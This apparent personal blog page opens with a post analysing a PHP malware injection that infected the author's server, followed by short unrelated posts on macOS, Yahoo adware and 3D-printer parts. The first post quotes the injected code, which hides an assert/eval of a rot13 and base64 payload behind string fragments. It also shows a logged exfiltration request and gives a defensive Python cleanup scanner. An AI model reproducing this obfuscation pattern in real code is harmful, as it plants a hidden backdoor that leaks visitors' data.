Battle against injected PHP

My main personal web server became infected with some effin malware that was injected into very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);   // silence and discard any errors the payload throws
...etc

// function names are assembled from fragments, so grepping for "assert", "str_rot13" or "eval" finds nothing
$strings = "as"; $strings .= "se";  $strings .= "rt";        // "assert"
$strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13";  // "str_rot13"
$gbz = "riny(".$strings2("base64_decode");                   // "riny(" is rot13 of "eval(", "onfr64_qrpbqr" is rot13 of "base64_decode"
$light =  $strings2($gbz.'("nJLtX...."));');                 // rot13 the whole thing back: eval(base64_decode("<rot13'd base64 payload>"));
$strings($light);                                            // assert("eval(...)") evaluates the string as PHP code (PHP < 8 only)
//###=CACHE END=###

This is kind of beautiful to me; it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example Apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.
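As an added example (not the author’s searchAndDestroy script), here is a small Python scanner that finds the injection by its `//###=CACHE START=###` / `//###=CACHE END=###` markers, reports every infected .php file, and only rewrites files when asked to, keeping a .bak copy. The sample infected file is constructed to match the block quoted above.

```python
import re
from pathlib import Path

START = "//###=CACHE START=###"
END = "//###=CACHE END=###"
# Everything between the two marker comments is the injection. DOTALL lets .*? span
# lines; the tail eats the newline after the END marker so no blank line is left behind.
BLOCK_RE = re.compile(re.escape(START) + r".*?" + re.escape(END) + r"[ \t]*\r?\n?", re.DOTALL)

# Constructed stand-in for an infected file, shaped like the block quoted in the post.
SAMPLE_INFECTED = (
    "<?php\n"
    "//###=CACHE START=###\n"
    "@error_reporting(E_ALL);\n"
    "$strings = \"as\"; $strings .= \"se\"; $strings .= \"rt\";\n"
    "$strings($light);\n"
    "//###=CACHE END=###\n"
    "echo \"legitimate code\";\n"
)
SAMPLE_CLEAN = "<?php\necho \"legitimate code\";\n"


def strip_injection(text):
    """Return (cleaned text, number of marker-delimited blocks removed)."""
    return BLOCK_RE.subn("", text)


def scan_tree(root, apply=False):
    """Walk root for *.php files and return {path: blocks found}.

    Dry run by default. With apply=True each infected file is rewritten in place after
    its original bytes are saved to <name>.bak, so a bad match can be reverted. Files are
    handled as bytes + surrogateescape so non-UTF-8 content survives the round trip.
    """
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        raw = path.read_bytes()
        cleaned, n = strip_injection(raw.decode("utf-8", "surrogateescape"))
        if n == 0:
            continue
        report[str(path)] = n
        if apply:
            path.with_name(path.name + ".bak").write_bytes(raw)
            path.write_bytes(cleaned.encode("utf-8", "surrogateescape"))
    return report


if __name__ == "__main__":
    import sys  # usage: python purge_cache_injection.py /var/www [--apply]
    for p, n in scan_tree(sys.argv[1], apply="--apply" in sys.argv[2:]).items():
        print(f"{p}: {n} block(s)")
```

This only catches the marker-wrapped variant shown here; a reinfection that drops the markers needs a different signature (the `"as"."se"."rt"` fragment pattern, for instance), and cleaning files does nothing about whatever vector put them there.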

MacPro3,1 upgrade to macOS Sierra

The time came to upgrade my trusty MacPro3,1 to macOS Sierra. As many know, El Cap is the latest build of OS X / macOS that supports this platform. How to get a MacPro3,1 onto Sierra is well-documented; nevertheless, this blog is half just a diary that I use to re-trace my steps later.


Boycott Yahoo!

Yahoo! used to be an awesome business that had a few products I used. But I’ve noticed lately when I install certain free utility applications, Yahoo! has managed to pepper-in their own adware.

Dear Yahoo!,

It’s time for a major course-correction. Either die entirely or get your crap together. Tricking people into using your products is an impressively sketchy proposition. Cease and desist this despicable practice right now.

Yours truly,

The entire Internet.

Illuminatrix


I first posted about my lighting solution in Cupcake155 Episode 4; it’s since evolved a bit and it’s time for an update.


DeltaFlyer Episode II: Prime Line Rollers

DeltaFlyer Episode II was originally posted to hackaday.io. I’ve mirrored it here for my own purposes.

For the Delta Flyer’s maiden voyage, I opted to go cheap and use Prime Line rollers (referenced in an earlier log). They’re fairly inexpensive and I didn’t have much grief finding them at a couple different local stores. They definitely have slop in them, so they’re not really a good choice and probably go from rough to terrible as print speed is increased. Episode II here is to illustrate how well these actually work.

I found that I could get passable motion. I ultimately replaced the Prime Line rollers with Delrin rollers. I was stunned to find the first prints out of the Delrins looked exactly the same as the Prime Line wheels. This eventually led me to find that my main source of error was that my print bed could move during the print. Therefore, I’m not really sure what the quality limit on the Prime Line rollers really is. My guess is you could get pretty damn good results, but if you tried to print fast, the slop in the bearings would become intolerable.

My Photo Album for Episode II is here.